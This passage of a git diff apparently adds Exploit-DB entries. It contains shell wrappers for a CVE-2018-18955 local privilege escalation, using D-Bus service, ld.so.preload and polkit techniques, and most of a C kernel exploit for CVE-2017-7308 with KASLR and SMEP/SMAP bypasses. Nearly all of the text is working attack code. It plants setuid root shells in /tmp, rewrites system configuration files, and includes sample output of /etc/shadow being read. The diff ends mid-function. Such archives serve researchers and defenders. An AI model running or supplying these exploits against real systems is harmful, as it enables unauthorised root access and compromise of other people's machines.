+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..."
+
+cat << EOF > "${service}.service"
+[D-BUS Service]
+Name=${service}
+Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}"
+User=root
+EOF
+
+echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell
+
+if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..."
+
+cat << EOF > "${service}.conf"
+<!DOCTYPE busconfig PUBLIC
+  "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
+  "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
+<busconfig>
+  <policy context="default">
+    <allow send_destination="${service}"/>
+  </policy>
+</busconfig>
+EOF
+
+echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell
+
+if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo "[*] Launching dbus service..."
+
+/usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}"
+
+sleep 1
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm subuid_shell
+/bin/rm subshell
+/bin/rm "${service}.conf"
+/bin/rm "${service}.service"
+echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell
+echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/linux/local/47166.sh b/exploits/linux/local/47166.sh
new file mode 100755
index 000000000..9d0a0cc60
--- /dev/null
+++ b/exploits/linux/local/47166.sh
@@ -0,0 +1,95 @@
+#!/bin/sh
+#
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47166.zip
+#
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses ld.so.preload technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.ldpreload.sh
+# [*] Compiling...
+# [*] Adding libsubuid.so to /etc/ld.so.preload...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Nov 21 19:07 /tmp/sh
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+lib="libsubuid.so"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then
+  echo 'Compiling libsubuid.c failed'
+  exit 1
+fi
+
+echo "[*] Adding ${lib} to /etc/ld.so.preload..."
+
+echo "cp ${lib} /lib/; echo /lib/${lib} > /etc/ld.so.preload" | ./subuid_shell ./subshell
+
+/usr/bin/newuidmap
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm subuid_shell
+/bin/rm subshell
+echo "/bin/rm /lib/${lib}" | $rootshell
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/linux/local/47167.sh b/exploits/linux/local/47167.sh
new file mode 100755
index 000000000..aee4e0dce
--- /dev/null
+++ b/exploits/linux/local/47167.sh
@@ -0,0 +1,120 @@
+#!/bin/sh
+#
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip
+#
+# wrapper for Jann Horn's exploit for CVE-2018-18955
+# uses polkit technique
+# ---
+# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh
+# [*] Compiling...
+# [*] Creating /usr/share/polkit-1/actions/subuid.policy...
+# [.] starting
+# [.] setting up namespace
+# [~] done, namespace sandbox set up
+# [.] mapping subordinate ids
+# [.] subuid: 165536
+# [.] subgid: 165536
+# [~] done, mapped subordinate ids
+# [.] executing subshell
+# [*] Launching pkexec...
+# [+] Success:
+# -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh
+# [*] Cleaning up...
+# [*] Launching root shell: /tmp/sh
+# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
+# uid=0(root) gid=0(root) groups=0(root),1001(test)
+
+rootshell="/tmp/sh"
+policy="subuid.policy"
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/pkexec; then
+  echo '[-] pkexec is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newuidmap; then
+  echo '[-] newuidmap is not installed'
+  exit 1
+fi
+
+if ! command_exists /usr/bin/newgidmap; then
+  echo '[-] newgidmap is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+echo "[*] Compiling..."
+
+if ! gcc subuid_shell.c -o subuid_shell; then
+  echo 'Compiling subuid_shell.c failed'
+  exit 1
+fi
+
+if ! gcc subshell.c -o subshell; then
+  echo 'Compiling gcc_subshell.c failed'
+  exit 1
+fi
+
+if ! gcc rootshell.c -o "${rootshell}"; then
+  echo 'Compiling rootshell.c failed'
+  exit 1
+fi
+
+echo "[*] Creating /usr/share/polkit-1/actions/${policy}..."
+
+echo '<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE policyconfig PUBLIC
+  "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
+  "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">
+<policyconfig>
+  <action id="org.freedesktop.policykit.exec">
+    <defaults>
+      <allow_any>yes</allow_any>
+      <allow_inactive>yes</allow_inactive>
+      <allow_active>yes</allow_active>
+    </defaults>
+  </action>
+</policyconfig>' > "${policy}"
+
+echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell
+
+if ! test -r "/usr/share/polkit-1/actions/${policy}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo "[*] Launching pkexec..."
+
+/usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}"
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo '[*] Cleaning up...'
+/bin/rm subuid_shell
+/bin/rm subshell
+/bin/rm "${policy}"
+echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell
+
+echo "[*] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/linux/local/47168.c b/exploits/linux/local/47168.c
new file mode 100644
index 000000000..a1e8f6340
--- /dev/null
+++ b/exploits/linux/local/47168.c
@@ -0,0 +1,781 @@
+// A proof-of-concept local root exploit for CVE-2017-7308.
+// Includes a SMEP & SMAP bypass.
+// Tested on Ubuntu / Linux Mint:
+// - 4.8.0-34-generic
+// - 4.8.0-36-generic
+// - 4.8.0-39-generic
+// - 4.8.0-41-generic
+// - 4.8.0-42-generic
+// - 4.8.0-44-generic
+// - 4.8.0-45-generic
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn 
+// [.] starting
+// [.] system has 2 processors
+// [.] checking kernel version
+// [.] kernel version '4.8.0-41-generic' detected
+// [~] done, version looks good
+// [.] checking SMEP and SMAP
+// [~] done, looks good
+// [.] setting up namespace sandbox
+// [~] done, namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [.] done, kernel text:   ffffffff87000000
+// [.] commit_creds:        ffffffff870a5cf0
+// [.] prepare_kernel_cred: ffffffff870a60e0
+// [.] native_write_cr4:    ffffffff87064210
+// [.] padding heap
+// [.] done, heap is padded
+// [.] SMEP & SMAP bypass enabled, turning them off
+// [.] done, SMEP & SMAP should be off now
+// [.] executing get root payload 0x401516
+// [.] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+// ---
+// Updated by <bcoles@gmail.com>
+// - support for systems with SMEP but no SMAP
+// - check number of CPU cores
+// - additional kernel targets
+// - additional KASLR bypasses
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308
+
+#define _GNU_SOURCE
+
+#include <assert.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sched.h>
+
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/sysinfo.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/udp.h>
+#include <netinet/if_ether.h>
+#include <net/if.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#       define dprintf printf
+#else
+#       define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS		1
+#define ENABLE_SMEP_SMAP_BYPASS		1
+
+char *SHELL = "/bin/bash";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 		0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+struct kernel_info {
+	const char* version;
+	uint64_t commit_creds;
+	uint64_t prepare_kernel_cred;
+	uint64_t native_write_cr4;
+};
+
+struct kernel_info kernels[] = {
+	{ "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x64210 },
+	{ "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x64210 },
+	{ "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+};
+
+// Used to get root privileges.
+#define COMMIT_CREDS			(KERNEL_BASE + kernels[kernel].commit_creds)
+#define PREPARE_KERNEL_CRED		(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
+#define NATIVE_WRITE_CR4		(KERNEL_BASE + kernels[kernel].native_write_cr4)
+
+// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS
+unsigned long CR4_DESIRED_VALUE =	0x406e0ul;
+
+#define KMALLOC_PAD			512
+#define PAGEALLOC_PAD			1024
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+typedef uint32_t u32;
+
+// $ pahole -C hlist_node ./vmlinux
+struct hlist_node {
+	struct hlist_node *        next;                 /*     0     8 */
+	struct hlist_node * *      pprev;                /*     8     8 */
+};
+
+// $ pahole -C timer_list ./vmlinux
+struct timer_list {
+	struct hlist_node          entry;                /*     0    16 */
+	long unsigned int          expires;              /*    16     8 */
+	void                       (*function)(long unsigned int); /*    24     8 */
+	long unsigned int          data;                 /*    32     8 */
+	u32                        flags;                /*    40     4 */
+	int                        start_pid;            /*    44     4 */
+	void *                     start_site;           /*    48     8 */
+	char                       start_comm[16];       /*    56    16 */
+};
+
+// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
+#define TIMER_OFFSET	896
+
+// pakcet_sock->xmit
+#define XMIT_OFFSET	1304
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void packet_socket_rx_ring_init(int s, unsigned int block_size,
+		unsigned int frame_size, unsigned int block_nr,
+		unsigned int sizeof_priv, unsigned int timeout) {
+	int v = TPACKET_V3;
+	int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
+	if (rv < 0) {
+		dprintf("[-] setsockopt(PACKET_VERSION)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	struct tpacket_req3 req;
+	memset(&req, 0, sizeof(req));
+	req.tp_block_size = block_size;
+	req.tp_frame_size = frame_size;
+	req.tp_block_nr = block_nr;
+	req.tp_frame_nr = (block_size * block_nr) / frame_size;
+	req.tp_retire_blk_tov = timeout;
+	req.tp_sizeof_priv = sizeof_priv;
+	req.tp_feature_req_word = 0;
+
+	rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
+	if (rv < 0) {
+		dprintf("[-] setsockopt(PACKET_RX_RING)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
+		unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
+	int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+	if (s < 0) {
+		dprintf("[-] socket(AF_PACKET)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
+		sizeof_priv, timeout);
+
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_family = PF_PACKET;
+	sa.sll_protocol = htons(ETH_P_ALL);
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_hatype = 0;
+	sa.sll_pkttype = 0;
+	sa.sll_halen = 0;
+
+	int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
+	if (rv < 0) {
+		dprintf("[-] bind(AF_PACKET)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	return s;
+}
+
+void packet_socket_send(int s, char *buffer, int size) {
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_halen = ETH_ALEN;
+
+	if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
+			sizeof(sa)) < 0) {
+		dprintf("[-] sendto(SOCK_RAW)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+void loopback_send(char *buffer, int size) {
+	int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
+	if (s == -1) {
+		dprintf("[-] socket(SOCK_RAW)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_send(s, buffer, size);
+}
+
+int packet_sock_kmalloc() {
+	int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+	if (s == -1) {
+		dprintf("[-] socket(SOCK_DGRAM)\n");
+		exit(EXIT_FAILURE);
+	}
+	return s;
+}
+
+void packet_sock_timer_schedule(int s, int timeout) {
+	packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
+}
+
+void packet_sock_id_match_trigger(int s) {
+	char buffer[16];
+	packet_socket_send(s, &buffer[0], sizeof(buffer));
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+#define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
+#define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+
+#define V3_ALIGNMENT	(8)
+#define BLK_HDR_LEN	(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))
+
+#define ETH_HDR_LEN	sizeof(struct ethhdr)
+#define IP_HDR_LEN	sizeof(struct iphdr)
+#define UDP_HDR_LEN	sizeof(struct udphdr)
+
+#define UDP_HDR_LEN_FULL	(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)
+
+int oob_setup(int offset) {
+	unsigned int maclen = ETH_HDR_LEN;
+	unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
+				(maclen < 16 ? 16 : maclen));
+	unsigned int macoff = netoff - maclen;
+	unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
+		0x8000 - BLK_HDR_LEN - macoff + offset;
+	return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
+}
+
+void oob_write(char *buffer, int size) {
+	loopback_send(buffer, size);
+}
+
+void oob_timer_execute(void *func, unsigned long arg) {
+	oob_setup(2048 + TIMER_OFFSET - 8);
+
+	int i;
+	for (i = 0; i < 32; i++) {
+		int timer = packet_sock_kmalloc();
+		packet_sock_timer_schedule(timer, 1000);
+	}
+
+	char buffer[2048];
+	memset(&buffer[0], 0, sizeof(buffer));
+
+	struct timer_list *timer = (struct timer_list *)&buffer[8];
+	timer->function = func;
+	timer->data = arg;
+	timer->flags = 1;
+
+	oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
+
+	sleep(1);
+}
+
+void oob_id_match_execute(void *func) {
+	int s = oob_setup(2048 + XMIT_OFFSET - 64);
+
+	int ps[32];
+
+	int i;
+	for (i = 0; i < 32; i++)
+		ps[i] = packet_sock_kmalloc();
+
+	char buffer[2048];
+	memset(&buffer[0], 0, 2048);
+
+	void **xmit = (void **)&buffer[64];
+	*xmit = func;
+
+	oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
+
+	for (i = 0; i < 32; i++)
+		packet_sock_id_match_trigger(ps[i]);
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+void kmalloc_pad(int count) {
+	int i;
+	for (i = 0; i < count; i++)
+		packet_sock_kmalloc();
+}
+
+void pagealloc_pad(int count) {
+	packet_socket_setup(0x8000, 2048, count, 0, 100);
+}
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+void get_root_payload(void) {
+	((_commit_creds)(COMMIT_CREDS))(
+		((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
+	);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+	int f = open(file, O_RDONLY);
+	if (f == -1)
+		return -1;
+	int bytes_read = 0;
+	while (true) {
+		int bytes_to_read = CHUNK_SIZE;
+		if (bytes_to_read > max_length - bytes_read)
+			bytes_to_read = max_length - bytes_read;
+		int rv = read(f, &buffer[bytes_read], bytes_to_read);
+		if (rv == -1)
+			return -1;
+		bytes_read += rv;
+		if (rv == 0)
+			return bytes_read;
+	}
+}
+
+void get_kernel_version(char* output, int max_length) {
+        struct utsname u;
+        int rv = uname(&u);
+        if (rv != 0) {
+                dprintf("[-] uname())\n");
+                exit(EXIT_FAILURE);
+        }
+        assert(strlen(u.release) <= max_length);
+        strcpy(&output[0], u.release);
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+#define KERNEL_VERSION_LENGTH 32
+
+void detect_versions() {
+	char version[KERNEL_VERSION_LENGTH];
+
+	get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);
+
+	int i;
+	for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+		if (strcmp(&version[0], kernels[i].version) == 0) {
+			dprintf("[.] kernel version '%s' detected\n", kernels[i].version);
+			kernel = i;
+			return;
+		}
+	}
+
+	dprintf("[-] kernel version not recognized\n");
+	exit(EXIT_FAILURE);
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
+int smap_smep_enabled() {
+	char buffer[PROC_CPUINFO_LENGTH];
+	char* path = "/proc/cpuinfo";
+	int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+	if (length == -1) {
+		dprintf("[-] open/read(%s)\n", path);
+		exit(EXIT_FAILURE);
+	}
+
+	int rv = 0;
+	char* found = memmem(&buffer[0], length, "smep", 4);
+	if (found != NULL)
+		rv += 1;
+	found = memmem(&buffer[0], length, "smap", 4);
+	if (found != NULL)
+		rv += 2;
+	return rv;
+}
+
+void check_smep_smap() {
+	int rv = smap_smep_enabled();
+
+#if !ENABLE_SMEP_SMAP_BYPASS
+	if (rv >= 1) {
+		dprintf("[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\n");
+		exit(EXIT_FAILURE);
+	}
+#endif
+
+	switch(rv) {
+	case 1: // SMEP
+		CR4_DESIRED_VALUE = 0x406e0ul;
+		break;
+	case 2: // SMAP
+		CR4_DESIRED_VALUE = 0x407f0ul;
+		break;
+	case 3: // SMEP and SMAP
+		CR4_DESIRED_VALUE = 0x407f0ul;
+		break;
+	}
+}
+
+// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+unsigned long get_kernel_addr_syslog() {
+	dprintf("[.] trying syslog...\n");
+
+	int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+	if (size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	size = (size / getpagesize() + 1) * getpagesize();
+	char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
+		MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+	size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
+	if (size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	const char *needle1 = "Freeing SMP";
+	char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) {
+		dprintf("[-] substring '%s' not found in dmesg\n", needle1);
+		exit(EXIT_FAILURE);
+	}
+
+	for (size = 0; substr[size] != '\n'; size++);
+
+	const char *needle2 = "ffff";
+	substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
+	if (substr == NULL) {
+		dprintf("[-] substring '%s' not found in dmesg\n", needle2);
+		exit(EXIT_FAILURE);
+	}
+
+	char *endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xfffffffffff00000ul;
+	r -= 0x1000000ul;
+
+	return r;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+	FILE *f;
+	unsigned long addr = 0;
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	char* path = "/proc/kallsyms";
+
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+	FILE *f;
+	unsigned long addr = 0;
+	char path[512] = "/boot/System.map-";
+	char version[32];
+	get_kernel_version(&version[0], 32);
+	strcat(path, &version[0]);
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+	unsigned long addr = 0;
+
+	addr = get_kernel_addr_kallsyms();
+        if (addr) return addr;
+
+	addr = get_kernel_addr_sysmap();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_syslog();
+	if (addr) return addr;
+
+	dprintf("[-] KASLR bypass failed\n");
+	exit(EXIT_FAILURE);
+
+	return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void check_procs() {
+	int min_procs = 2;
+
+	int nprocs = 0;
+	nprocs = get_nprocs_conf();
+
+	if (nprocs < min_procs) {
+		dprintf("[-] system has less than %d processor cores\n", min_procs);
+		exit(EXIT_FAILURE);
+	}
+
+	dprintf("[.] system has %d processors\n", nprocs);
+}
+
+void exec_shell() {
+	int fd;
+
+	fd = open("/proc/1/ns/net", O_RDONLY);
+	if (fd == -1) {
+		dprintf("error opening /proc/1/ns/net\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (setns(fd, CLONE_NEWNET) == -1) {
+		dprintf("error calling setns\n");
+		exit(EXIT_FAILURE);
+	}
+
+	system(SHELL);
+}
+
+void fork_shell() {
+	pid_t rv;
+
+	rv = fork();
+	if (rv == -1) {
+		dprintf("[-] fork()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (rv == 0) {
+		exec_shell();
+	}
+}
+
+bool is_root() {
+	// We can't simple check uid, since we're running inside a namespace
+	// with uid set to 0. Try opening /etc/shadow instead.
+	int fd = open("/etc/shadow", O_RDONLY);
+	if (fd == -1)
+		return false;
+	close(fd);
+	return true;
+}
+
+void check_root() {
+	dprintf("[.] checking if we got root\n");
+
+	if (!is_root()) {
+		dprintf("[-] something went wrong =(\n");
+		return;
+	}
+
+	dprintf("[+] got r00t ^_^\n");
+
+	// Fork and exec instead of just doing the exec to avoid potential
+	// memory corruptions when closing packet sockets.
+	fork_shell();
+}
+
+bool write_file(const char* file, const char* what, ...) {
+	char buf[1024];
+	va_list args;
+	va_start(args, what);
+	vsnprintf(buf, sizeof(buf), what, args);
+	va_end(args);
+	buf[sizeof(buf) - 1] = 0;
+	int len = strlen(buf);
+
+	int fd = open(file, O_WRONLY | O_CLOEXEC);
+	if (fd == -1)
+		return false;
+	if (write(fd, buf, len) != len) {
+		close(fd);
+		return false;
+	}
+	close(fd);
+	return true;
+}
+
+void setup_sandbox() {
+	int real_uid = getuid();
+	int real_gid = getgid();
+
+        if (unshare(CLONE_NEWUSER) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+        if (unshare(CLONE_NEWNET) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (!write_file("/proc/self/setgroups", "deny")) {
+		dprintf("[-] write_file(/proc/self/set_groups)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
+		dprintf("[-] write_file(/proc/self/uid_map)\n");
+		exit(EXIT_FAILURE);
+	}
